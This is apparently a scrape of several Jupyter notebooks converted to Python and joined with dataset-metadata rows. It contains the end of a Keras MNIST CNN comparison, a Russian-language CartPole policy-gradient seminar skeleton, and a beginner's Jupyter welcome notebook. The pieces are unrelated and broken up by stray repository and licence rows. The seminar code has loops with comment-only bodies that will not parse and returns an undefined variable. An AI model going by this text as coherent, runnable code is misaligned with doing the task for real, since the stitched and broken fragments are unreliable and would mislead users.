score_E1 = model_E1.evaluate(x_test, y_test, verbose=1)
# + colab={"base_uri": "https://localhost:8080/", "height": 51} colab_type="code" id="GixlMY8C9m42" outputId="d6675f4c-a0e5-492e-d99d-d4a7ad40d15f"
print('Test loss:', score_E1[0])
print('Test accuracy:', score_E1[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="zQ_Kpn5sfAaN" outputId="54181d88-4037-4246-8b8a-371d41470b39"
# ploting loss with each epoch of model_E1
# Loss curves for experiment E1 (note the E-experiments run epochs_E epochs).
fig, ax=plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy Loss')
x = list(range(1,epochs_E+1)) # List of epoch Numbers
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="lWCsX6IifAnS"
# ### Model_E2(Experiment2) = Single Layer Architecture + kernel (7, 7) + relu + Adadelta + MaxPooling(2,2) + padding + Dropout(0.3)
# + colab={"base_uri": "https://localhost:8080/", "height": 629} colab_type="code" id="cQLYz-VwfA0E" outputId="73a9971a-65c4-40a6-fae4-a9b6d10caf61"
# Model E2(Experiment2) = Single Layer Architecture + kernel (7, 7) + relu + Adadelta + MaxPooling(2,2) + padding + Dropout(0.3)
# %%time
from keras.layers import Activation
# A single 7x7 conv layer (64 filters) + 2x2 max-pooling + dropout,
# followed by a 254-unit dense head and a 10-way softmax.
model_E2 = Sequential()
model_E2.add(Conv2D(64, kernel_size=(7, 7), activation='relu', input_shape=input_shape))
model_E2.add(MaxPooling2D(pool_size=(2, 2)))
model_E2.add(Dropout(0.3))
model_E2.add(Flatten())
model_E2.add(Dense(254, activation='relu'))
model_E2.add(Dense(num_classes_E, activation='softmax'))
model_E2.compile(optimizer=keras.optimizers.Adadelta(), loss='categorical_crossentropy', metrics=['accuracy'])
history = model_E2.fit(x_train, y_train, batch_size=batch_size_E, epochs=epochs_E, verbose=1, validation_data=(x_test, y_test))
# BUG FIX: the original called `model_3_conv_5L.evaluate(...)`, but
# `model_3_conv_5L` is never defined anywhere in this notebook and the
# line raised NameError.  Evaluate the model that was just trained.
score_E2 = model_E2.evaluate(x_test, y_test, verbose=1)
print('Test loss:', score_E2[0])
print('Test accuracy:', score_E2[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="MIMQmaXGfA3P" outputId="2e76596a-3148-41ef-f6de-8b6e28b9944c"
# ploting loss with each epoch of model_E2
# Loss curves for experiment E2.
fig, ax = plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy')
x = list(range(1,epochs_E+1)) # List of epoch Numbers
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="zGDQVPIDfBDx"
# ### Model_E3(Experiment3) = 4Layer Architecture + kernel (11, 11) + relu + L2 Reg + Adam + MaxPooling(2, 2) + padding + Dropout(0.5)
# + colab={"base_uri": "https://localhost:8080/", "height": 629} colab_type="code" id="l0hWfqbYfBTE" outputId="528c154a-08b9-4a83-acee-c10b55ba1307"
# Model E3(Experiment3) = 4Layer Architecture + kernel (11, 11) + relu + L2 Reg + Adam + MaxPooling(2, 2) + padding + Dropout(0.5)
# %%time
# Four 11x11 'same'-padded conv layers (16/32/64/128), heavy 0.5
# dropout after each pooling stage, weaker L2 (0.001) on the first two.
model_E3 = Sequential()
model_E3.add(Conv2D(16, kernel_size=(11, 11), padding='same', kernel_regularizer=regularizers.l2(0.001), activation='relu', input_shape=input_shape))
model_E3.add(MaxPooling2D(pool_size=(2, 2)))
model_E3.add(Dropout(0.5))
model_E3.add(Conv2D(32, kernel_size=(11, 11), padding='same', kernel_regularizer=regularizers.l2(0.001), activation='relu'))
model_E3.add(Conv2D(64, kernel_size=(11,11), padding='same', activation='relu'))
model_E3.add(MaxPooling2D(pool_size=(2, 2)))
model_E3.add(Dropout(0.5))
model_E3.add(Conv2D(128, kernel_size=(11, 11), padding='same', activation='relu'))
model_E3.add(MaxPooling2D(pool_size=(2,2)))
model_E3.add(Dropout(0.5))
model_E3.add(Flatten())
model_E3.add(Dense(254, activation='relu'))
model_E3.add(Dense(num_classes, activation='softmax'))
model_E3.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
history = model_E3.fit(x_train, y_train, batch_size=batch_size_E, epochs=epochs_E, verbose=1, validation_data=(x_test, y_test))
score_E3 = model_E3.evaluate(x_test, y_test, verbose=1)
print('test loss :', score_E3[0])
print('test accuracy :', score_E3[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="ag538tLJfBu5" outputId="ac8fc9aa-6e2d-41dd-eaa8-6d060f1da0db"
# ploting loss with epoch of model_E3
# Loss curves for experiment E3.
fig,ax = plt.subplots(1,1)
ax.set_xlabel('epoch') ; ax.set_ylabel('Categorical Crossentropy Loss')
# list of epoch numbers
x = list(range(1,epochs_E+1))
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + colab={"base_uri": "https://localhost:8080/", "height": 295} colab_type="code" id="-Pum-9PEfBsx" outputId="d958707b-1598-4b06-8b97-0a0df90688f3"
# ploting Train Accuracy , validation Accuracy , train loss , validation loss
# All four E3 metrics on one chart.
import matplotlib.pyplot as plt
# NOTE(review): Keras < 2.3 records these keys as 'acc'/'val_acc';
# newer versions use 'accuracy'/'val_accuracy' -- confirm the version
# pinned for this notebook.
plt.plot(history.history["acc"])
plt.plot(history.history['val_acc'])
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.grid()
plt.title("model accuracy")
plt.ylabel("Accuracy")
plt.xlabel("Epoch")
plt.legend(["Train Accuracy","Validation Accuracy","Train loss","Validation Loss"])
plt.show()
# + [markdown] colab_type="text" id="eFT_bbmafB6B"
# ### Model_4(Experiment4) : 2Layer Architecture + Kernel(3, 3) with relu followed by maxpooling (2, 2), padding, L2 reg, Adam, and with out Dropout
# + colab={"base_uri": "https://localhost:8080/", "height": 629} colab_type="code" id="Q8ABr8-kfBQ4" outputId="4d2a374e-9b62-4e30-f7ed-5f1235907068"
# Model_4(Experiment4) : 2Layer Architecture + Kernel(3, 3) with relu followed by maxpooling (2, 2), padding, L2 reg, Adam, and with out Dropout
# %%time
# Two 3x3 conv layers (64/128) with pooling after each; L2 (0.001) and
# 'same' padding only on the first.  No dropout, Adam optimizer.
model_E4 = Sequential()
model_E4.add(Conv2D(64, kernel_size=(3, 3), padding='same', kernel_regularizer=regularizers.l2(0.001), activation='relu', input_shape=input_shape))
model_E4.add(MaxPooling2D(pool_size=(2, 2)))
model_E4.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))
model_E4.add(MaxPooling2D(pool_size=(2, 2)))
model_E4.add(Flatten())
model_E4.add(Dense(254, activation='relu'))
model_E4.add(Dense(num_classes, activation='softmax'))
model_E4.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
history_E4 = model_E4.fit(x_train, y_train, verbose=1, batch_size=batch_size_E, epochs=epochs_E, validation_data=(x_test, y_test))
score_E4 = model_E4.evaluate(x_test, y_test, verbose=1,)
print('Test Loss:', score_E4[0])
print('Test Accuracy:', score_E4[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 295} colab_type="code" id="4PLvQVu532cP" outputId="ed0fbbc0-38f2-4c01-d00d-8a69bbde60a7"
# ploting loss with epoch of model_E4
# Loss curves for experiment E4, drawn directly with pyplot.
import matplotlib.pyplot as plt
plt.plot(history_E4.history['loss'])
plt.plot(history_E4.history['val_loss'])
plt.grid()
plt.title('loss with epoch of model_E4')
plt.xlabel('epoch')
plt.ylabel('Categorical_Croosentropy')
plt.legend(['Train loss', 'Validation loss'])
plt.show()
# + colab={} colab_type="code" id="jqA9E-4DsXvy"
from prettytable import PrettyTable
p = PrettyTable()
p.field_names = ['Model', 'Architec',"batch",'epochs','kernel','MaxPool','Activation', "Optimizer",'Regulrize',
'Dropout','Val_loss', 'Val_Acc' ]
p.add_row(["Model_1","2 Layer", 128, 12, "3, 3", "2, 2", "relu", "Adadelta", "L2 (0.01)", 0.25, 0.029, 0.9916 ])
p.add_row(["Model_2","3 Layer", 128, 12, "5, 5", "2, 2", "relu", "Adadelta", "L2 (0.01)", 0.25, 2.698, 0.9390 ])
p.add_row(["Model_3","3 Layer", 128, 12, "7, 7", "2, 2", "relu", "Adam", "L2 (0.01)", "--", 0.0364, 0.9925 ])
p.add_row(["Model_E1","3 Layer",150, 15, "9, 9", "2, 2", "relu", "Adam", "L2 (0.01)", 0.3, 0.0403, 0.9906 ])
p.add_row(["Model_E2","1 Layer",150, 15, "7, 7", "2, 2", "relu", "Adadelta", "--", 0.3, 0.0300, 0.9913 ])
p.add_row(["Model_E3","4 Layer",150, 15, "11, 11","2, 2", "relu", "Adam", "L2 (0.001)", 0.5, 0.0569, 0.9914 ])
p.add_row(["Model_E4","2 Layer",150, 15, "3, 3", "2, 2", "relu", "Adam", "L2 (0.001)", "--", 0.0356, 0.9909 ])
print(p)
# -
# # Conclusion : Overall Summary with Experiment
# * **Tried various models with different hidden-layer architectures and different approaches (kernel size, max-pooling,
# activation, optimizer, regularizer, padding and dropout).**
# * **L2 regularization helped model performance and kept the models from overfitting.**
# * **All models required a large amount of computational power (trained on CPU).**
# * **For better model performance, the hidden-layer sizes, batch size, and epochs should be chosen reasonably: neither too high nor too low for the size of the dataset at hand.**
# * **Across all the different approaches tried, loss and accuracy varied within reasonable limits.**
# * **CNN models also work well with many layers and large kernel sizes.**
# * **Overall, CNN models achieve high accuracy and low loss on the MNIST dataset.**
#
# + [markdown] colab_type="text" id="dfBHPBmj_SML"
# <div style="text-align:center"><span style="color:green;fontfamily:Georgia; font-size:2em;">Thank You.</div></span>
#
# <nav style="text-align:center">
# <a href="https://www.linkedin.com/in/rameshbattuai/">**Sign Off RAMESH BATTU**</a></nav>
| 19,740 |
/part2_RL_2/Seminar_4_Policy_grad.ipynb
|
883d467e7eedd12f57cb57f65e2fcf2083d964fc
|
[] |
permissive
|
letimofeev/ml_mipt_dafe_major
|
https://github.com/letimofeev/ml_mipt_dafe_major
| 0 | 0 |
MIT
| 2020-09-25T16:35:27 | 2020-09-23T08:15:13 | null |
Jupyter Notebook
| false | false |
.py
| 68,254 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Семинар 4. Policy Gradients
# +
import gym
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
# -
# ## Policy Gradients
# Мы будем обучать агента без явного отображения значения для каждой пары состояние-действие в среде. Будем обновлять политику на основе вознаграждения, связанного с каждым шагом. Агент может получить награду сразу за действие, или агент может получить награду позже, например, в конце эпизода.
# Мы применим метод под названием «Градиент политики Монте-Карло», который означает, что агент будет проходить весь эпизод, а затем обновлять нашу политику в зависимости от полученных наград.
#Hyperparameters
learning_rate = 0.01   # Adam step size for the policy network
G = 0.99               # discount factor (gamma) for future rewards
seed = 543             # fixed seed for reproducible runs
render = True          # rendering flag (not referenced later in this notebook)
log_interval = 10      # print training progress every N episodes
env = gym.make('CartPole-v1')
# NOTE(review): env.seed() was removed in gym >= 0.26; this assumes an
# older gym API -- confirm the pinned gym version.
env.seed(seed)
torch.manual_seed(seed)
# ## Соберем нейронную сеть для апроксимации политики
# +
class Policy(nn.Module):
    """Skeleton of the policy network: maps a state to action probabilities.

    This is seminar material -- the layer definitions and the forward
    pass are intentionally left for the student to implement.
    """
    def __init__(self):
        super(Policy, self).__init__()
        # TODO (student): build your own network layers here

    def forward(self, x):
        """TODO (student): compute and return action probabilities for x."""

policy = Policy()
optimizer = optim.Adam(policy.parameters(), lr=learning_rate)
# Smallest positive float32 increment; used below to avoid division by
# zero when normalizing the discounted returns.
eps = np.finfo(np.float32).eps.item()
# -
# ## Select Action
# Функция select_action выбирает действие на основе распределения вероятностей нашей политики. Наша политика возвращает вероятность для каждого возможного действия в нашем пространстве действий (движение влево или вправо) в виде массива длиной два, например [0,7, 0,3]. Затем мы выбираем действие на основе этих вероятностей, записываем историю действий и возвращаем действие актора.
def select_action(state):
    """Sample an action from the policy's distribution for *state*.

    Skeleton for the seminar: the student should convert the state to a
    tensor, run the policy to obtain action probabilities, sample an
    action from them (e.g. via torch.distributions.Categorical), and
    record its log-probability for the policy-gradient update.
    """
    # Read the state
    # Predict the action probabilities
    # Choose an action based on the probabilities (e.g. e-greedy)
    # NOTE: `action` is undefined until the steps above are implemented.
    return action.item()
# ## Обновление политики
# Мы обновляем нашу политику играя эпизоды. Выигрыш определяется как ожидаемый доход от выполнения действия $ a $ в состоянии $ s $ в соответствии с политикой $ \pi $.
#
# Мы знаем, что за каждый шаг продолжения симуляции мы получаем вознаграждение в размере 1. Мы можем использовать это для вычисления градиента политики на каждом временном шаге, где $ r $ - это вознаграждение для конкретной пары состояние-действие. Вместо мгновенного вознаграждения $ r $ мы используем долгосрочное вознаграждение $ v_{t} $, где $ v_{t} $ - это дисконтированная сумма всех будущих вознаграждений на протяжении всего эпизода. Таким образом, чем "дольше" эпизод длится, тем "больше" награда за конкретную пару состояние-действие в настоящем. $ v_{t} $ тогда,
#
# $$ v_{t} = \sum_{k=0}^{N} \gamma^{k}r_{t+k} $$
#
# где $ \gamma $ - коэффициент дисконтирования (0,99). Например, если эпизод длится 5 шагов, награда за каждый шаг будет [4,90, 3,94, 2,97, 1,99, 1].
# Затем мы масштабируем наш вектор вознаграждения, вычитая среднее значение из каждого элемента и масштабируя до единичной дисперсии путем деления на стандартное отклонение (нормировка).
#
# Затем мы передадим нашу историю политик, умноженную на наши вознаграждения, нашему оптимизатору и обновим веса нашей нейронной сети, используя стохастический градиентный спуск. Это должно увеличить вероятность действий, которые принесли нашему агенту более крупное вознаграждение.
#
#
def update_policy():
    """Monte-Carlo policy-gradient update at the end of an episode.

    Skeleton for the seminar: discount the episode's rewards into
    returns, normalize them, weight each step's log-probability by its
    return, and take one optimizer step.  The loop bodies are left for
    the student to fill in (as written, the comment-only loops will not
    parse until implemented).
    """
    R = 0
    policy_loss = []
    returns = []
    # Discount the rewards for each step (accumulate R = r + G * R
    # while walking the episode backwards; prepend to `returns`)
    for r in policy.rewards[::-1]:
        # Normalize the returns (subtract mean, divide by std + eps)
        # Compute the "loss" contribution for this step
    for log_prob, R in zip(policy.saved_log_probs, returns):
        # Accumulate -log_prob * R into policy_loss
    # Update the network weights
    optimizer.zero_grad()
    policy_loss = torch.cat(policy_loss).sum()
    policy_loss.backward()
    optimizer.step()
    # Clear the episode buffers for the next rollout
    del policy.rewards[:]
    del policy.saved_log_probs[:]
# ## Training
# Наш основной цикл обучения политике. Для каждого шага в эпизоде мы выбираем действие, делаем шаг по среде и записываем полученное новое состояние и награду. Мы вызываем update_policy() в конце каждого эпизода, чтобы передать историю эпизодов в нашу нейронную сеть и улучшить нашу политику.
def main(episodes):
    """Run *episodes* training episodes; return the per-episode rewards.

    Skeleton for the seminar: the inner per-step loop (action selection,
    environment step, reward bookkeeping) and the running-reward /
    policy updates are left for the student to implement.
    """
    running_reward = 10
    reward_history = []
    # Loop over episodes
    for i_episode in range(episodes):
        state = env.reset()
        ep_reward = 0
        # Loop within a single episode
        # The iteration cap bounds training time per episode
        for t in range(1, 10000):
            # TODO (student): select an action, step the environment,
            # store the reward and break when the episode terminates
        reward_history.append(ep_reward)
        # Update the running (smoothed) average reward
        # Update the policy (call update_policy() at episode end)
        if i_episode % log_interval == 0:
            print('Episode {}\tПоследняя награда: {:.2f}\tСредняя награда: {:.2f}'.format(
                i_episode, ep_reward, running_reward))
        if running_reward > env.spec.reward_threshold:
            print("Solved! Running reward is now {} and "
                  "the last episode runs to {} time steps!".format(running_reward, t))
            break
    return reward_history
# ## Run Model
# Train for 50 episodes and keep the per-episode rewards for plotting.
episodes = 50
reward_history = main(episodes)
# Reward threshold at which gym considers CartPole-v1 solved
# (shown as the cell's output value).
env.spec.reward_threshold
env.reset()
env.close()
# ## Plot Results
# +
# BUG FIX: this notebook's import cell only brings in gym, numpy and
# torch, so `plt` and `pd` below raised NameError -- import them here.
import matplotlib.pyplot as plt
import pandas as pd

# Smooth the per-episode rewards with a rolling window one fifth of the
# run length and shade +/- one rolling standard deviation around it;
# the second panel shows the raw per-episode rewards.
window = int(episodes / 5)
fig, (ax1, ax2) = plt.subplots(2, 1, sharey=True, figsize=[9, 9])
rolling_mean = pd.Series(reward_history).rolling(window).mean()
std = pd.Series(reward_history).rolling(window).std()
ax1.plot(rolling_mean)
ax1.fill_between(range(len(reward_history)), rolling_mean - std, rolling_mean + std,
                 color='orange', alpha=0.2)
ax1.set_title('Episode Length Moving Average ({}-episode window)'.format(window))
ax1.set_xlabel('Episode'); ax1.set_ylabel('Episode Length')
ax2.plot(reward_history)
ax2.set_title('Episode Length')
ax2.set_xlabel('Episode'); ax2.set_ylabel('Episode Length')
fig.tight_layout(pad=2)
plt.show()
#fig.savefig('results.png')
| 6,097 |
/welcome.ipynb
|
ba2080b0dc5c697d96294e0666e076b4f572598b
|
[
"MIT"
] |
permissive
|
georgetown-analytics/XBUS-500-01.Foundations-of-Data-Science
|
https://github.com/georgetown-analytics/XBUS-500-01.Foundations-of-Data-Science
| 17 | 12 |
MIT
| 2023-08-16T20:36:16 | 2022-08-12T02:52:39 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 3,083 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Welcome to Jupyter notebook!
#
# Hopefully you made it here by following the instructions in the readme file. We will be using notebooks a lot throughout the course.
#
# Notebooks let you run code and add things, like this block of text. Double click on this text. You should get a markdown cell that you can edit.
#
# Type something here:
# We can also run python code in notebooks.
#
# Run the following cell. (Don't forget to check the alt text!)
import antigravity
# :-)
#
# (If nothing happened, look in the top right corner and verify it says "Python 3", not "Python 2".)
#
# Now try the following blocks of code.
s = "Hello world"
print (s)        # prints the string as-is
print (s[::-1])  # slicing with step -1 reverses the string
# If there is a problem with your code, error messages will also be displayed.
# NOTE: the next line is deliberately Python-2 syntax; under the
# Python 3 kernel it raises a SyntaxError so learners can see what an
# error message looks like (as the comment above explains).  Do not "fix" it.
print s
# You will be expected to understand basic navigation of the notebook. You are also encouraged to add cells and try out different pieces of code when we are going though labs. For more information on using notebooks you are highly encouraged to go through the [tutorial](https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html) available online.
#
# You can also take a look at this [example data science notebook](https://github.com/rhiever/Data-Analysis-and-Machine-Learning-Projects/tree/master/example-data-science-notebook). It is a good example of how notebooks are used and will give you an idea of where this course is going.
#
#
| 1,698 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.